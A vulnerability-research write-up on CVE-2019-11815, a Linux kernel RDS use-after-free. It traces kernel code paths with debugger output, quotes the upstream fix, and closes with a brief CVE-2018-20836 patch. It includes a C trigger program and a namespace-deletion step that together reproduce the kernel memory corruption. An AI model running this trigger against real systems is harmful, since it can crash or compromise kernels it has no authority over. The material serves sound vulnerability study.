CVE-2019-11815
> An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.
> When cleaning up a net namespace, rds_tcp_exit_net() calls
> rds_tcp_kill_sock(). If t_sock is NULL, it does not call
> rds_conn_destroy(), rds_conn_path_destroy() or rds_tcp_conn_free() to free the
> connection, and the cp_conn_w worker is not stopped; afterwards the net is
> freed in net_drop_ns(). The cp_conn_w worker, rds_connect_worker(), then calls
> rds_tcp_conn_path_connect() and dereferences the 'net' that has already been freed.
```c
#define list_for_each_entry_safe(pos, tmp, head, member) \
for (pos = __container_of((head)->next, pos, member), \
tmp = __container_of(pos->member.next, pos, member); \
&pos->member != (head); \
pos = tmp, tmp = __container_of(pos->member.next, tmp, member))
static void rds_tcp_kill_sock(struct net *net)
{
struct rds_tcp_connection *tc, *_tc;
LIST_HEAD(tmp_list);
struct rds_tcp_net *rtn = net_generic(net, rds_tcp_netid);
struct socket *lsock = rtn->rds_tcp_listen_sock;
rtn->rds_tcp_listen_sock = NULL;
rds_tcp_listen_stop(lsock, &rtn->rds_tcp_accept_w);
spin_lock_irq(&rds_tcp_conn_lock);
list_for_each_entry_safe(tc, _tc, &rds_tcp_conn_list, t_tcp_node) {
struct net *c_net = read_pnet(&tc->t_cpath->cp_conn->c_net);
if (net != c_net || !tc->t_sock)
continue;
if (!list_has_conn(&tmp_list, tc->t_cpath->cp_conn)) {
list_move_tail(&tc->t_tcp_node, &tmp_list);
} else {
list_del(&tc->t_tcp_node);
tc->t_tcp_node_detached = true;
}
}
spin_unlock_irq(&rds_tcp_conn_lock);
list_for_each_entry_safe(tc, _tc, &tmp_list, t_tcp_node)
rds_conn_destroy(tc->t_cpath->cp_conn);
}
```
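For reference, the upstream fix ("net: rds: force to destroy connection if t_sock is NULL in rds_tcp_kill_sock()", commit cb66ddd15620) essentially just drops the `!tc->t_sock` check, so connections whose t_sock is still NULL get destroyed as well:

```c
-		if (net != c_net || !tc->t_sock)
+		if (net != c_net)
 			continue;
```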
```c
static void __net_exit rds_tcp_exit_net(struct net *net)
{
struct rds_tcp_net *rtn = net_generic(net, rds_tcp_netid);
rds_tcp_kill_sock(net);
if (rtn->rds_tcp_sysctl)
unregister_net_sysctl_table(rtn->rds_tcp_sysctl);
if (net != &init_net)
kfree(rtn->ctl_table);
}
static struct pernet_operations rds_tcp_net_ops = {
.init = rds_tcp_init_net,
.exit = rds_tcp_exit_net,
.id = &rds_tcp_netid,
.size = sizeof(struct rds_tcp_net),
};
static void rds_tcp_exit(void)
{
rds_tcp_set_unloading();
synchronize_rcu();
rds_info_deregister_func(RDS_INFO_TCP_SOCKETS, rds_tcp_tc_info);
#if IS_ENABLED(CONFIG_IPV6)
rds_info_deregister_func(RDS6_INFO_TCP_SOCKETS, rds6_tcp_tc_info);
#endif
unregister_pernet_device(&rds_tcp_net_ops);
rds_tcp_destroy_conns();
rds_trans_unregister(&rds_tcp_transport);
rds_tcp_recv_exit();
kmem_cache_destroy(rds_tcp_conn_slab);
}
module_exit(rds_tcp_exit);
static int rds_tcp_init(void)
{
int ret;
rds_tcp_conn_slab = kmem_cache_create("rds_tcp_connection",
sizeof(struct rds_tcp_connection),
0, 0, NULL);
if (!rds_tcp_conn_slab) {
ret = -ENOMEM;
goto out;
}
ret = rds_tcp_recv_init();
if (ret)
goto out_slab;
ret = register_pernet_device(&rds_tcp_net_ops);
if (ret)
goto out_recv;
rds_trans_register(&rds_tcp_transport);
rds_info_register_func(RDS_INFO_TCP_SOCKETS, rds_tcp_tc_info);
#if IS_ENABLED(CONFIG_IPV6)
rds_info_register_func(RDS6_INFO_TCP_SOCKETS, rds6_tcp_tc_info);
#endif
goto out;
out_recv:
rds_tcp_recv_exit();
out_slab:
kmem_cache_destroy(rds_tcp_conn_slab);
out:
return ret;
}
```
The socket() syscall path:
```
SYSCALL_DEFINE3(socket, int, family, int, type, int, protocol)
{
return __sys_socket(family, type, protocol);
}
int __sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;
int flags;
/* Check the SOCK_* constants for consistency. */
BUILD_BUG_ON(SOCK_CLOEXEC != O_CLOEXEC);
BUILD_BUG_ON((SOCK_MAX | SOCK_TYPE_MASK) != SOCK_TYPE_MASK);
BUILD_BUG_ON(SOCK_CLOEXEC & SOCK_TYPE_MASK);
BUILD_BUG_ON(SOCK_NONBLOCK & SOCK_TYPE_MASK);
flags = type & ~SOCK_TYPE_MASK;
if (flags & ~(SOCK_CLOEXEC | SOCK_NONBLOCK))
return -EINVAL;
type &= SOCK_TYPE_MASK;
if (SOCK_NONBLOCK != O_NONBLOCK && (flags & SOCK_NONBLOCK))
flags = (flags & ~SOCK_NONBLOCK) | O_NONBLOCK;
retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
return retval;
return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK));
}
int sock_create(int family, int type, int protocol, struct socket **res)
{
return __sock_create(current->nsproxy->net_ns, family, type, protocol, res, 0);
}
```
```c
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
/*
* Check protocol is in range
*/
if (family < 0 || family >= NPROTO)
return -EAFNOSUPPORT;
if (type < 0 || type >= SOCK_MAX)
return -EINVAL;
/* Compatibility.
This uglymoron is moved from INET layer to here to avoid
deadlock in module load.
*/
if (family == PF_INET && type == SOCK_PACKET) {
pr_info_once("%s uses obsolete (PF_INET,SOCK_PACKET)\n",
current->comm);
family = PF_PACKET;
}
err = security_socket_create(family, type, protocol, kern);
if (err)
return err;
/*
* Allocate the socket and allow the family to set things up. if
* the protocol is 0, the family is instructed to select an appropriate
* default.
*/
sock = sock_alloc();
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;
#ifdef CONFIG_MODULES
/* Attempt to load a protocol module if the find failed.
*
* 12/09/1996 Marcin: But! this makes REALLY only sense, if the user
* requested real, full-featured networking support upon configuration.
* Otherwise module support will break!
*/
if (rcu_access_pointer(net_families[family]) == NULL)
request_module("net-pf-%d", family);
#endif
rcu_read_lock();
pf = rcu_dereference(net_families[family]);
err = -EAFNOSUPPORT;
if (!pf)
goto out_release;
/*
* We will call the ->create function, that possibly is in a loadable
* module, so we have to bump that loadable module refcnt first.
*/
if (!try_module_get(pf->owner))
goto out_release;
/* Now protected by module ref count */
rcu_read_unlock();
err = pf->create(net, sock, protocol, kern);
if (err < 0)
goto out_module_put;
/*
* Now to bump the refcnt of the [loadable] module that owns this
* socket at sock_release time we decrement its refcnt.
*/
if (!try_module_get(sock->ops->owner))
goto out_module_busy;
/*
* Now that we're done with the ->create function, the [loadable]
* module can have its refcnt decremented
*/
module_put(pf->owner);
err = security_socket_post_create(sock, family, type, protocol, kern);
if (err)
goto out_sock_release;
*res = sock;
return 0;
out_module_busy:
err = -EAFNOSUPPORT;
out_module_put:
sock->ops = NULL;
module_put(pf->owner);
out_sock_release:
sock_release(sock);
return err;
out_release:
rcu_read_unlock();
goto out_sock_release;
}
```
The first argument of the syscall is the domain (address family); for RDS, `#define AF_RDS 21`.
For example, AF_INET (IPv4) is 2:
```
pwndbg> p net_families[2]
$9 = (const struct net_proto_family *) 0xffffffff81f149f0 <inet_family_ops>
pwndbg> p *net_families[2]
$21 = {
family = 2,
create = 0xffffffff818e0fa0 <inet_create>,
owner = 0x0 <irq_stack_union>
}
```
AF_INET6 (IPv6) is 10:
```
pwndbg> p net_families[10]
$19 = (const struct net_proto_family *) 0xffffffff81f18140 <inet6_family_ops>
pwndbg> p *net_families[10]
$22 = {
family = 10,
create = 0xffffffff81918fe0 <inet6_create>,
owner = 0x0 <irq_stack_union>
}
```
Entries for other families may be NULL, meaning that family is not supported:
```
pwndbg> p net_families[21]
$20 = (const struct net_proto_family *) 0x0 <irq_stack_union>
```
**Rebuild the kernel with the RDS options enabled in kconfig.**
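The options involved are CONFIG_RDS and CONFIG_RDS_TCP; building them in (`=y`) rather than as modules matches the `owner = 0x0` seen in the net_families entries here (a built-in family has no owning module):

```
CONFIG_RDS=y
CONFIG_RDS_TCP=y
```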
The second argument is the socket type, here `SOCK_SEQPACKET = 5`:
```
► 0xffffffff81822b62 <__sys_socket+82> call __sock_create <0xffffffff81820b70>
rdi: 0xffffffff825d2540 (init_net) ◂— 0x100000002
rsi: 0x15
rdx: 0x5
rcx: 0x0
r8: 0xffffc900001d7f08 ◂— 0x100
r9: 0x0
int __sock_create(struct net *net, int family, int type, int protocol, struct socket **res, int kern)
```
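These register values correspond to a userspace call along the following lines (a minimal sketch; the fallback define covers libc headers that do not expose AF_RDS):

```c
#include <stdio.h>
#include <sys/socket.h>

#ifndef AF_RDS
#define AF_RDS 21          /* matches rsi = 0x15 in the trace above */
#endif

int main(void)
{
    /* family = AF_RDS (21), type = SOCK_SEQPACKET (5), protocol = 0 */
    int fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (fd < 0)
        perror("socket(AF_RDS, SOCK_SEQPACKET, 0)");
    else
        printf("rds socket fd = %d\n", fd);
    return 0;
}
```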
```c
pwndbg> p *(struct net *)0xffffffff825d2540
$1 = {
passive = {
refs = {
counter = 2
}
},
...
```
__sock_create again, annotated with the values observed in the debugger:
```c
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
/*
* Check protocol is in range
*/
if (family < 0 || family >= NPROTO)
return -EAFNOSUPPORT;
if (type < 0 || type >= SOCK_MAX)
return -EINVAL;
// pass
/* Compatibility.
This uglymoron is moved from INET layer to here to avoid
deadlock in module load.
*/
if (family == PF_INET && type == SOCK_PACKET) {
pr_info_once("%s uses obsolete (PF_INET,SOCK_PACKET)\n",
current->comm);
family = PF_PACKET;
}
// pass
err = security_socket_create(family, type, protocol, kern);
// ► 0xffffffff81820bcc <__sock_create+92> call security_socket_create <0xffffffff813e5560>
// rdi: 0x15
// rsi: 0x5
// rdx: 0x0
// rcx: 0x0
// pass eax = 0
if (err)
return err;
/*
* Allocate the socket and allow the family to set things up. if
* the protocol is 0, the family is instructed to select an appropriate
* default.
*/
sock = sock_alloc();
// sock = 0xffff888006099180
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;
//sock = {
// state = SS_UNCONNECTED,
// type = 5,
// flags = 0,
// wq = 0xffff888005a8ca40,
// file = 0x0 <irq_stack_union>,
// sk = 0x0 <irq_stack_union>,
// ops = 0x0 <irq_stack_union>
//}
#ifdef CONFIG_MODULES
/* Attempt to load a protocol module if the find failed.
*
* 12/09/1996 Marcin: But! this makes REALLY only sense, if the user
* requested real, full-featured networking support upon configuration.
* Otherwise module support will break!
*/
if (rcu_access_pointer(net_families[family]) == NULL)
request_module("net-pf-%d", family);
#endif
rcu_read_lock();
pf = rcu_dereference(net_families[family]);
err = -EAFNOSUPPORT;
if (!pf)
goto out_release;
/*
* We will call the ->create function, that possibly is in a loadable
* module, so we have to bump that loadable module refcnt first.
*/
if (!try_module_get(pf->owner))
goto out_release;
/* Now protected by module ref count */
rcu_read_unlock();
err = pf->create(net, sock, protocol, kern);
if (err < 0)
goto out_module_put;
/*
* Now to bump the refcnt of the [loadable] module that owns this
* socket at sock_release time we decrement its refcnt.
*/
if (!try_module_get(sock->ops->owner))
goto out_module_busy;
/*
* Now that we're done with the ->create function, the [loadable]
* module can have its refcnt decremented
*/
module_put(pf->owner);
err = security_socket_post_create(sock, family, type, protocol, kern);
if (err)
goto out_sock_release;
*res = sock;
return 0;
out_module_busy:
err = -EAFNOSUPPORT;
out_module_put:
sock->ops = NULL;
module_put(pf->owner);
out_sock_release:
sock_release(sock);
return err;
out_release:
rcu_read_unlock();
goto out_sock_release;
}
```
__rcu: RCU, Read-Copy-Update
```
struct net_proto_family {
int family;
int (*create)(struct net *net, struct socket *sock,
int protocol, int kern);
struct module *owner;
};
```
After rebuilding the kernel by hand, the RDS module is registered and its net_families entry looks like this:
```
pwndbg> p *net_families[21]
$2 = {
family = 21,
create = 0xffffffff81909a00 <rds_create>,
owner = 0x0 <irq_stack_union>
}
```
Then, at line 1276 of \_\_sock\_create, pf->create(net, sock, protocol, kern) — i.e. rds_create(net, sock, protocol, kern) — is called successfully,
with the following arguments:
```c
rdi: 0xffffffff8231ac00 (init_net) ◂— 0x100000002
rsi: 0xffff888006b93180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rdx: 0x0
rcx: 0x0
```
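rds_create (net/rds/af_rds.c) is also why the socket type matters: anything other than SOCK_SEQPACKET with protocol 0 is rejected. A simplified sketch of the 5.0-era source, allocation details hedged:

```c
/* simplified sketch of rds_create() in net/rds/af_rds.c */
static int rds_create(struct net *net, struct socket *sock, int protocol,
		      int kern)
{
	struct sock *sk;

	/* RDS only supports SOCK_SEQPACKET with protocol 0 */
	if (sock->type != SOCK_SEQPACKET || protocol)
		return -ESOCKTNOSUPPORT;

	sk = sk_alloc(net, AF_RDS, GFP_KERNEL, &rds_proto, kern);
	if (!sk)
		return -ENOMEM;

	return __rds_create(sock, sk, protocol);
}
```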
rds\_bind calls rds\_trans\_get\_preferred to choose the transport (trans);
\_\_rds\_conn\_create contains the same logic.
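In rds_bind (net/rds/bind.c) the chosen transport ends up cached in rs->rs_transport. A simplified sketch, error paths omitted and details hedged:

```c
	/* sketch: tail of rds_bind() after the local address has been validated */
	trans = rds_trans_get_preferred(sock_net(sock->sk), binding_addr,
					scope_id);
	if (!trans) {
		ret = -EADDRNOTAVAIL;
		goto out;
	}
	/* the transport vtable (here rds_tcp_transport) is cached on the socket */
	rs->rs_transport = trans;
```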
sendmsg:
```c
► 0xffffffff817c6a3e <__sys_sendmsg+94> call ___sys_sendmsg <0xffffffff817c51f0>
rdi: 0xffff888006b97180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rsi: 0x7ffd0bcddda0 —▸ 0x7ffd0bcdddf0 ◂— add al, byte ptr [rax] /* 0x100007ff7130002 */
rdx: 0xffffc9000018fec0 ◂— 0x81efe0b0
rcx: 0x0
r8: 0x0
r9: 0x0
```
sock_sendmsg:
```c
► 0xffffffff817c54a7 <___sys_sendmsg+695> call sock_sendmsg <0xffffffff817c4dc0>
rdi: 0xffff888006b97180 ◂— add dword ptr [rax], eax /* 0x500000001 */
rsi: 0xffffc9000018fec0 —▸ 0xffffc9000018fdc0 ◂— 0x100007ff7130002
```
rds_conn_create_outgoing in rds_sendmsg
```c
► 0xffffffff81911b89 <rds_sendmsg+1817> call rds_conn_create_outgoing <0xffffffff8190d310>
rdi: 0xffffffff8231ac00 (init_net) ◂— add al, byte ptr [rax] /* 0x200000002 */
rsi: 0xffff888005ed0750 ◂— 0
rdx: 0xffffc9000018fca0 ◂— 0x0
rcx: 0xffffffff8232c340 (rds_loop_transport) ◂— insb byte ptr [rdi], dx /* 0x6b636162706f6f6c; 'loopback' */
r8: 0x6000c0
r9: 0x0
```
__rds_conn_create():
```c
► 0xffffffff8190d31d <rds_conn_create_outgoing+13> call __rds_conn_create <0xffffffff8190ca10>
rdi: 0xffffffff8231ac00 (init_net) ◂— add al, byte ptr [rax] /* 0x200000002 */
rsi: 0xffff888005ed0750 ◂— 0
rdx: 0xffffc9000018fca0 ◂— 0x0
rcx: 0xffffffff8232c340 (rds_loop_transport) ◂— insb byte ptr [rdi], dx /* 0x6b636162706f6f6c; 'loopback' */
r8: 0x6000c0
r9: 0x1
arg[6]: 0x0
```
Here ret = conn->c_trans->conn_path_connect(cp); the function pointer points to 0xffffffff81913510 (rds_loop_conn_path_connect):
```c
► 0xffffffff81912eab <rds_connect_worker+107> call __x86_indirect_thunk_rax <0xffffffff81c00ca0>
rdi: 0xffff888005f77a00 —▸ 0xffff88800583f000 ◂— 0
rsi: 0x40
rdx: 0x1
rcx: 0xffff88800703a020 ◂— 0xffff88800703a020
```
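rds_connect_worker (net/rds/threads.c) is the work function behind cp_conn_w. A simplified sketch of the part that matters here, error handling hedged:

```c
void rds_connect_worker(struct work_struct *work)
{
	struct rds_conn_path *cp = container_of(work,
						struct rds_conn_path,
						cp_conn_w.work);
	struct rds_connection *conn = cp->cp_conn;
	int ret;

	clear_bit(RDS_RECONNECT_PENDING, &cp->cp_flags);
	if (rds_conn_path_transition(cp, RDS_CONN_DOWN, RDS_CONN_CONNECTING)) {
		/* rds_tcp_conn_path_connect() for TCP,
		 * rds_loop_conn_path_connect() for loopback */
		ret = conn->c_trans->conn_path_connect(cp);

		if (ret) {
			/* connect failed: fall back to DOWN and queue a
			 * reconnect, which re-arms this same delayed work */
			if (rds_conn_path_transition(cp, RDS_CONN_CONNECTING,
						     RDS_CONN_DOWN))
				rds_queue_reconnect(cp);
		}
	}
}
```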
The key transport-selection function looks like this:
```c
struct rds_transport *rds_trans_get_preferred(struct net *net,
const struct in6_addr *addr,
__u32 scope_id)
{
struct rds_transport *ret = NULL;
struct rds_transport *trans;
unsigned int i;
if (ipv6_addr_v4mapped(addr)) {
if (*(u_int8_t *)&addr->s6_addr32[3] == IN_LOOPBACKNET)
return &rds_loop_transport;
} else if (ipv6_addr_loopback(addr)) {
return &rds_loop_transport;
}
down_read(&rds_trans_sem);
for (i = 0; i < RDS_TRANS_COUNT; i++) {
trans = transports[i];
if (trans && (trans->laddr_check(net, addr, scope_id) == 0) &&
(!trans->t_owner || try_module_get(trans->t_owner))) {
ret = trans;
break;
}
}
up_read(&rds_trans_sem);
return ret;
}
```
The global transports array:
```c
pwndbg> p transports
$44 = {0x0 <irq_stack_union>, 0x0 <irq_stack_union>, 0xffffffff8232c4e0 <rds_tcp_transport>}
pwndbg> p transports[2]->laddr_check
$45 = (int (*)(struct net *, const struct in6_addr *, __u32)) 0xffffffff81915900 <rds_tcp_laddr_check>
```
We want trans to end up being rds_tcp_transport:
```c
static int rds_tcp_laddr_check(struct net *net, const struct in6_addr *addr,
__u32 scope_id)
{
struct net_device *dev = NULL;
#if IS_ENABLED(CONFIG_IPV6)
int ret;
#endif
if (ipv6_addr_v4mapped(addr)) {
if (inet_addr_type(net, addr->s6_addr32[3]) == RTN_LOCAL) // the address must be in the local routing table
return 0;
return -EADDRNOTAVAIL;
}
/* If the scope_id is specified, check only those addresses
* hosted on the specified interface.
*/
if (scope_id != 0) { // I did not find a path that makes scope_id nonzero...
rcu_read_lock();
dev = dev_get_by_index_rcu(net, scope_id);
/* scope_id is not valid... */
if (!dev) {
rcu_read_unlock();
return -EADDRNOTAVAIL;
}
rcu_read_unlock();
}
#if IS_ENABLED(CONFIG_IPV6)
ret = ipv6_chk_addr(net, addr, dev, 0);
if (ret)
return 0;
#endif
return -EADDRNOTAVAIL;
}
```
To pass the laddr_check check, the bind address must therefore resolve to RTN_LOCAL:
```c
// the caller passes net and addr->s6_addr32[3]
// ► 0xffffffff8191594f <rds_tcp_laddr_check+79> call inet_addr_type <0xffffffff81886310>
// rdi: 0xffffffff8231ac00 (init_net) ◂— 0x200000002
// rsi: 0xa0ad60a
// called with net, NULL, addr, RT_TABLE_LOCAL
static inline unsigned int __inet_dev_addr_type(struct net *net,
const struct net_device *dev,
__be32 addr, u32 tb_id)
{
struct flowi4 fl4 = { .daddr = addr };
struct fib_result res;
unsigned int ret = RTN_BROADCAST;
struct fib_table *table;
if (ipv4_is_zeronet(addr) || ipv4_is_lbcast(addr)) // 0.x.x.x or 255.255.255.255
return RTN_BROADCAST;
if (ipv4_is_multicast(addr)) // class D (multicast) address
return RTN_MULTICAST;
rcu_read_lock();
table = fib_get_table(net, tb_id);
if (table) {
ret = RTN_UNICAST;
if (!fib_table_lookup(table, &fl4, &res, FIB_LOOKUP_NOREF)) {
if (!dev || dev == res.fi->fib_dev)
ret = res.type;
}
}
rcu_read_unlock();
return ret;
}
```
The call to rds_tcp_conn_path_connect:
```c
► 0xffffffff81912eab <rds_connect_worker+107> call __x86_indirect_thunk_rax <0xffffffff81c00ca0>
rdi: 0xffff888005f7c000 —▸ 0xffff88800582f000 ◂— 0
rsi: 0x40
rdx: 0x1
rcx: 0xffff88800703a020 ◂— 0xffff88800703a020
```
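rds_tcp_conn_path_connect (net/rds/tcp_connect.c) is where the already-freed struct net is finally dereferenced: the kernel socket for the TCP connection is created in rds_conn_net(conn), i.e. the namespace the connection was created in. A simplified sketch, assuming the IPv4-mapped case and omitting the rest:

```c
int rds_tcp_conn_path_connect(struct rds_conn_path *cp)
{
	struct rds_connection *conn = cp->cp_conn;
	struct rds_tcp_connection *tc = cp->cp_transport_data;
	struct socket *sock = NULL;
	int ret;

	mutex_lock(&tc->t_conn_path_lock);
	if (rds_conn_path_up(cp)) {
		mutex_unlock(&tc->t_conn_path_lock);
		return 0;
	}

	/* rds_conn_net(conn) returns conn->c_net; after the namespace has been
	 * torn down this is a dangling pointer, and sock_create_kern()
	 * dereferences it -- the use-after-free. */
	ret = sock_create_kern(rds_conn_net(conn), PF_INET, SOCK_STREAM,
			       IPPROTO_TCP, &sock);
	if (ret < 0)
		goto out;

	/* ... bind to the local address, set callbacks, kernel_connect() ... */
out:
	mutex_unlock(&tc->t_conn_path_lock);
	return ret;
}
```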
Summary:
rds_bind calls rds_trans_get_preferred, which calls laddr_check — here rds_tcp_laddr_check — which in turn calls inet_addr_type to check whether the address is RTN_LOCAL (macro value 2); if so, laddr_check returns 0. Beyond that, the only other check rds_trans_get_preferred performs is:
```c
if (trans && (trans->laddr_check(net, addr, scope_id) == 0) &&
(!trans->t_owner || try_module_get(trans->t_owner))) {
ret = trans;
break;
}
```
If rds_tcp_transport is returned successfully, the TCP vtable is stored in rs->rs_transport.
Later, rds_sendmsg calls rds_conn_create_outgoing, which calls __rds_conn_create,
where the same check is performed and trans is assigned. __rds_conn_path_init then uses INIT_WORK (INIT_DELAYED_WORK) to set up rds_connect_worker as the cp_conn_w work item, and the worker calls conn->c_trans->conn_path_connect(cp). If the connect fails, rds_queue_reconnect re-queues the worker and rds_tcp_restore_callbacks sets t_sock to NULL. Because t_sock is NULL, rds_tcp_kill_sock() — reached via the umount/unlink syscalls during net namespace cleanup — skips this connection and never stops its worker. The struct net is then freed, but the conn_path_connect callback still references it: a use-after-free.
The disassembly of inet_addr_type is somewhat interesting.
The possible t_type values of a transport:
```c
#define RDS_TRANS_IB 0
#define RDS_TRANS_IWARP 1
#define RDS_TRANS_TCP 2
#define RDS_TRANS_COUNT 3
#define RDS_TRANS_NONE (~0)
```
rds\_tcp\_init\_net calls INIT_WORK(&rtn->rds_tcp_accept_w, rds_tcp_accept_worker);
rds_tcp_accept_worker calls rds\_tcp\_accept\_one;
rds\_tcp\_accept\_one calls rds\_conn\_create;
rds\_conn\_create and rds\_conn\_create\_outgoing both call __rds_conn_create;
\_\_rds\_conn\_create() calls __rds_conn_path_init;
\_\_rds\_conn\_path\_init calls INIT_DELAYED_WORK(&cp->cp_conn_w, rds_connect_worker).
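For reference, __rds_conn_path_init (net/rds/connection.c) sets up all of the per-path workers, cp_conn_w among them — roughly:

```c
	/* sketch: worker setup in __rds_conn_path_init() */
	INIT_DELAYED_WORK(&cp->cp_send_w, rds_send_worker);
	INIT_DELAYED_WORK(&cp->cp_recv_w, rds_recv_worker);
	INIT_DELAYED_WORK(&cp->cp_conn_w, rds_connect_worker);
	INIT_WORK(&cp->cp_down_w, rds_shutdown_worker);
```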
reconnect: 0xffffffff81913510
sock_sendmsg -> sock_sendmsg_nosec -> sock->ops->sendmsg(rds_sendmsg)
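In net/socket.c that dispatch looks roughly like this; for an AF_RDS socket sock->ops is rds_proto_ops, so ->sendmsg is rds_sendmsg:

```c
static inline int sock_sendmsg_nosec(struct socket *sock, struct msghdr *msg)
{
	/* for AF_RDS sockets sock->ops->sendmsg == rds_sendmsg */
	int ret = sock->ops->sendmsg(sock, msg, msg_data_left(msg));

	BUG_ON(ret == -EIOCBQUEUED);
	return ret;
}

int sock_sendmsg(struct socket *sock, struct msghdr *msg)
{
	int err = security_socket_sendmsg(sock, msg,
					  msg_data_left(msg));

	return err ?: sock_sendmsg_nosec(sock, msg);
}
```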
sock at 0xffff888006b97180
file at 0xffff888006479600
fd = 3
```c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/utsname.h>
#include <arpa/inet.h> // inet_addr()
#define RECVPORT 5111
#define SENDPORT 6111
#define PF_RDS AF_RDS
#define AF_RDS 21
int main(int argc, char *argv[]) {
int s, ret2;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0); // RDS only supports SOCK_SEQPACKET (see rds_create)
if (s < 0) {
printf("blacklisted.\n");
}
memset(&addr, 0, sizeof(addr));
addr.sin_addr.s_addr = inet_addr("10.0.10.214"); // a local (RTN_LOCAL) address
addr.sin_family = AF_INET;
addr.sin_port = htons(5111);
ret2 = bind(s, (struct sockaddr *)&addr, sizeof(addr));
if (ret2 < 0) {
printf("failed binding.\n");
}
// try to send message
int size, ret;
struct sockaddr_in recvaddr;
struct msghdr msg;
struct iovec iov;
unsigned long buf;
memset(&recvaddr, 0, sizeof(recvaddr));
size = sizeof(recvaddr);
recvaddr.sin_port = htons(RECVPORT);
recvaddr.sin_family = AF_INET;
recvaddr.sin_addr.s_addr = inet_addr("114.114.114.114"); // a non-local address, so the TCP connect will fail
memset(&msg, 0, sizeof(msg));
msg.msg_name = &recvaddr;
msg.msg_namelen = sizeof(recvaddr);
msg.msg_iovlen = 1;
buf = 0xffffffff;
iov.iov_len = sizeof(buf);
iov.iov_base = &buf;
msg.msg_iov = &iov;
ret = sendmsg(s, &msg, 0); // send on the RDS socket
if (ret < 0) {
printf("failed to send.\n");
}
printf("sent.\n");
return 0;
}
```
From outside the namespace, running `ip netns delete` is enough to trigger the namespace cleanup and the use-after-free.
CVE-2018-20836
> An issue was discovered in the Linux kernel before 4.20. There is a race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c, leading to a use-after-free.
```c
diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
index 5222294..0d1f727 100644
--- a/drivers/scsi/libsas/sas_expander.c
+++ b/drivers/scsi/libsas/sas_expander.c
@@ -48,17 +48,16 @@ static void smp_task_timedout(struct timer_list *t)
unsigned long flags;
spin_lock_irqsave(&task->task_state_lock, flags);
- if (!(task->task_state_flags & SAS_TASK_STATE_DONE))
+ if (!(task->task_state_flags & SAS_TASK_STATE_DONE)) {
task->task_state_flags |= SAS_TASK_STATE_ABORTED;
+ complete(&task->slow_task->completion);
+ }
spin_unlock_irqrestore(&task->task_state_lock, flags);
-
- complete(&task->slow_task->completion);
}
static void smp_task_done(struct sas_task *task)
{
- if (!del_timer(&task->slow_task->timer))
- return;
+ del_timer(&task->slow_task->timer);
complete(&task->slow_task->completion);
}
```